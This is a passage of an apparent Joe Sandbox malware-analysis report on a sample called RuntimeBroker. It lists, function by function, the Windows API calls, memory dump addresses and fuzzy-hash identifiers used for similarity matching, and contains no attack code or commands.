                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                • Instruction ID: c7dfdb86f8e7b35c32b853fdb9aa5c213066ecb37e5093cdda27ef89ebd06a0e
                                                                                                                                                                                • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                • Instruction Fuzzy Hash: D341C532E1878143E365AB25995037DA260FF98764F549338D65C43AE9DF7CA1E08B20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                • Instruction ID: 9e72c2b248a69c027bca582dbd90e284560123b00cf7dd4417d90ab532dc5979
                                                                                                                                                                                • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 40311A11A0864241FA76BB6C9CA53B99281FF45788FD41039EA0E47AF3DE2CF9458F35

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                • Instruction ID: 4c7431cefc51d2c3c4bc47c3569015e8213f3c240b820131c7022439265ddbcd
                                                                                                                                                                                • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED06710B1970687EA7A3B785C691799351AF9C741F90143DD84A0A3B3DD2CA8495E74
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                • Instruction ID: b3ce195ae496e00d581070107994c9237756ac34ca31e6f61d1ed744f826caba
                                                                                                                                                                                • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                • Instruction Fuzzy Hash: E551B961B0924245E636BF2D9D8067AE291FF44BA4F944634DE6D47BF5CE3CE4018F20
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069ED6
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B069CE5,?,?,00000000,00007FF72B069D9A), ref: 00007FF72B069EE0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1687624791-0
                                                                                                                                                                                • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                • Instruction ID: 2f4644afd922b1e5157689ef8598afdfcdafe112b50f9db75b69ec44e89d1eca
                                                                                                                                                                                • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                • Instruction Fuzzy Hash: 1721A721F1C64241EE7A7769AD5037D9291DF8C7A0F88423DDA2E47BF6CE6CE5404B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                • Instruction ID: 2a842859367c16081b218a64e9adb14f58672a61e5e86746a8b65955b8c079ef
                                                                                                                                                                                • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 5311BFA1B08A8181DA21AB29AC44179E361FB48BF4F980335EE7D077FACF3CD1508B40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                • Instruction ID: 12270a8a75ca09993c8c8368b0e1ad6c6286b94bc4b5dc24b1707c41ed112153
                                                                                                                                                                                • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C41B972B0820247EA35AB1DA95227DB3A0EF5D781F940139DA9D476B1CF3CE503CB61
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                • Opcode ID: 7546fdf25d121e01a387d4e844d1ef2fa81ddd0b8f883c38f86f7b75a69df56f
                                                                                                                                                                                • Instruction ID: 77c8f901887c23e37d59c76d917a642e40c7612d2bb5bf4fdfcb01d6e1cc520e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7546fdf25d121e01a387d4e844d1ef2fa81ddd0b8f883c38f86f7b75a69df56f
                                                                                                                                                                                • Instruction Fuzzy Hash: 84219321B0865546FA32BB1A6D443BAD645FF49BC4FC88430DE0C07BA6DE3DE041CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                • Instruction ID: 15a7f94d2434b57da418998f74f7be344362384a7cc11d0d0c793e61bd31752c
                                                                                                                                                                                • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                • Instruction Fuzzy Hash: 08317E21F1865286E773BB1E9C4137DA650EF58BA5F950139DA2D033F2DE7CA8818B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                • Instruction ID: 10796378ce4140bf13a9ac4e117c5cf7332a2d6c647b6b2057e01cf8758d3830
                                                                                                                                                                                • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                • Instruction Fuzzy Hash: 10219132B157058DEB26AF68D8442EC73A0FB48368F84463AD61C06AE5EF78E444CF64
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                • Instruction ID: 4fc0c5960fc2bc28e91f2ae739c4df15e835f4aa3d209fe586e70b95d2e2add0
                                                                                                                                                                                • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                • Instruction Fuzzy Hash: DB113021B1964641EA76BF59981027EE2A4EF5AB80F844439EB4C57AA6CE3CD5408B60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                • Instruction ID: 38d1c4e4a4bab0ee81f23f05f374cced832a0f36c7ed4e4d17e28152245e4a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E215672A18A4186DB729F1CE8403BDF660EB94B94F944234D65D476EADF3DD800DF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                • Instruction ID: 42c3af35cf93cdc92a3a1f1ecd281f13aa4051c7f03cfa7541adcb7727036003
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B01A521B0874641E925BB5A5D4006DE695FB59FE0F888635DE5C13BEADE3CE4028B10
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,?,00007FF72B05FFB0,?,?,?,00007FF72B06161A,?,?,?,?,?,00007FF72B062E09), ref: 00007FF72B06C94A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                • Instruction ID: c3c0ce42795c7bc4807a1bd7a02b326b8fa82869ddcfb66acacd385049474d89
                                                                                                                                                                                • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CF05E00F1924745FF77777A5C59279D180DF4CB60FC842389D2E452E1DE1CE5418930
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9
                                                                                                                                                                                • LoadLibraryW.KERNELBASE(?,00007FF72B055C06,?,00007FF72B05308E), ref: 00007FF72B0581C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                • Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                                                                                                • Instruction ID: 47da46643f56eb8e86bb9a3fe6e2b3dacf58f5b268fda03f623d59215a1f1d2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD08C01B2424181EA69BB6BAE466799151AB89BC0E888034EE1C07B6ADC3CD0800B04
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
                                                                                                                                                                                • Instruction ID: 881996fef6c2a2139a2e66ed20ccaba875190192bd466715665aef7d9b2a213c
                                                                                                                                                                                • Opcode Fuzzy Hash: fcbdb7a3bb33d61edf12612711e3872dd56886a0f228ec4408bb52a4007a3dc4
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FB01220FF540FC1991437798C4E0305150A764702FD01220C006C21B0CC0C00DB0A10
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A1B
                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A9E
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ABD
                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ACB
                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ADC
                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057AE5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
